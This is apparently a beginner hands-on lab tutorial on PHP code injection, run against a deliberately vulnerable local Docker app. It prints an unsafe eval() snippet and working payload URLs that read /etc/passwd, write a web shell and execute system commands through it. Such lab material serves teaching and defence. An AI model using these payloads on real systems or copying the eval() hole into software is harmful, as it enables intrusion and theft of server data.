Code Injection Vulnerability: A Hands-on Approach

Beginner

Introduction

In this lab, you will explore the concept of code injection vulnerabilities in web applications. Code injection is a common vulnerability that allows an attacker to execute malicious code on the server by injecting code into user input fields. The objective is to understand the principles behind code injection vulnerabilities and learn how to exploit them through practical exercises.

Set up the Vulnerable Application

In this part of our course, we're going to set up a web application that's intentionally vulnerable, specifically, it has a code injection vulnerability. This will help us learn how to identify and mitigate such issues. Here's how you can get this application up and running:

docker run -d -p 82:80 --name pentesterlab-WebforPentest-1 -it jewel591/vulnbox:pentesterlab-WebforPentest-1 /bin/sh -c 'service apache2 start && tail -f /var/log/apache2/error.log' && docker exec pentesterlab-WebforPentest-1 chmod 777 /var/www/codeexec

Let's break this down a bit:

  • docker run -d -p 82:80 --name pentesterlab-WebforPentest-1 -it jewel591/vulnbox:pentesterlab-WebforPentest-1 is starting a new Docker container with our vulnerable web app. The -d flag tells Docker to run the container in the background. The -p 82:80 part is mapping port 80 inside the container to port 82 on your machine.
  • /bin/sh -c 'service apache2 start && tail -f /var/log/apache2/error.log' is starting the Apache web server inside the container and then continuously displaying the server's error log.
  • docker exec pentesterlab-WebforPentest-1 chmod 777 /var/www/codeexec is changing the permissions of the /var/www/codeexec directory inside the running container, so the web application can work correctly.

Once the command has been run and the Docker container is active, you can interact with the application by opening your web browser and navigating to http://localhost:82/codeexec/example1.php?name=hacker. This will take you to our intentionally vulnerable web application. Happy learning!

example1.php

Understand the Code Injection Vulnerability

In the previous step, we set up a web application that has a built-in code injection vulnerability. Let's take a closer look at the PHP code that makes this possible:

<?php
  $str="echo \"Hello ".$_GET['name']."!!!\";";
  eval($str);
?>

Here, the eval() function in PHP is being used to execute a string as PHP code. The problem arises when the user-supplied value from the name parameter in the URL is directly added into the string that eval() runs. Because there's no check on what input is allowed, this opens the door to code injection attacks.

Now, let's see this vulnerability in action. We can inject our own PHP code by breaking out of the existing string and adding our own. Try visiting this URL:

http://localhost:82/codeexec/example1.php?name=hacker";phpinfo();

You'll likely see an error message. This is because our injected code has caused a syntax error - we've left some double quotes unbalanced. But don't worry, we can fix this by using PHP's comment syntax to end the existing string.

error1

Give this URL a try:

http://localhost:82/codeexec/example1.php?name=hacker";phpinfo();//

This time, the phpinfo() function should run successfully, displaying information about the server's PHP configuration. This shows us that we've successfully exploited the code injection vulnerability. As you can see, even small oversights in code can lead to significant security risks!

success

Exploiting Code Injection for File Inclusion

In this step, we're going to explore a common technique for exploiting code injection vulnerabilities: including remote files on the server. We'll be using PHP's file_get_contents() function to accomplish this.

Here's a payload you can try out to read the /etc/passwd file on the server:

http://localhost:82/codeexec/example1.php?name=hacker%22;var_dump(file_get_contents(%20%27/etc/passwd%27));//

The result look like following:

passwd_info

Let's break this down:

  • http://localhost:82/codeexec/example1.php?name=hacker is the URL of our vulnerable application, as we've seen before.
  • %22;var_dump(file_get_contents(%20%27/etc/passwd%27)); is the key part of our payload. It uses the file_get_contents() function to read the contents of the file at /etc/passwd, and then var_dump() to display them.
  • // is just a way to comment out the rest of the code, so it doesn't interfere with our payload.

The /etc/passwd file contains information about user accounts on the system. This can be quite valuable when you're attempting to exploit a system further. So, by using this payload, we can potentially gain a lot of useful information. Give it a try and see what you can learn!

Writing Files on the Server

In this final part of our lab, we're going to explore another common exploitation technique: writing files on the server. This can be accomplished using PHP's file_put_contents() function. This technique can be especially useful for uploading web shells or other malicious code to the server.

Here's a payload you can try to create a simple web shell named shell.php:

http://localhost:82/codeexec/example1.php?name=hacker%22;var_dump(file_put_contents($_GET[1],$_GET[2]));//&1=shell.php&2=<?php system($_GET['cmd'])?>

Let's break this down:

  • http://localhost:82/codeexec/example1.php?name=hacker is the URL of our vulnerable application, as before.
  • %22;var_dump(file_put_contents($_GET[1],$_GET[2])); is using the file_put_contents() function to create a file with a name given by $_GET[1] and content given by $_GET[2]. It then uses var_dump() to display the result of this operation.
  • //&1=shell.php&2=<?php system($_GET['cmd'])?> is providing the arguments for the file_put_contents() function. shell.php is the name of the file we're creating, and <?php system($_GET['cmd'])?> is the content of the file. This PHP code will execute any command passed through the cmd parameter in the query string.

Once you've executed this payload, you should be able to access the shell.php file and execute system commands on the server. For instance, you can try visiting the following URL:

http://localhost:82/codeexec/shell.php?cmd=uname -a

The result look like following:

shell_php

This will execute the uname -a command on the server and display the output, giving you some basic information about the server's operating system. Give it a try and see what you can learn!

Summary

In this lab, you learned about code injection vulnerabilities and how to exploit them using various techniques. You set up a vulnerable web application, understood the underlying vulnerability, and exploited it by injecting PHP code to execute system commands, read sensitive files, and write files on the server. This hands-on experience will help you better understand the risks associated with code injection vulnerabilities and how to mitigate them in web applications.

Other Tutorials you may like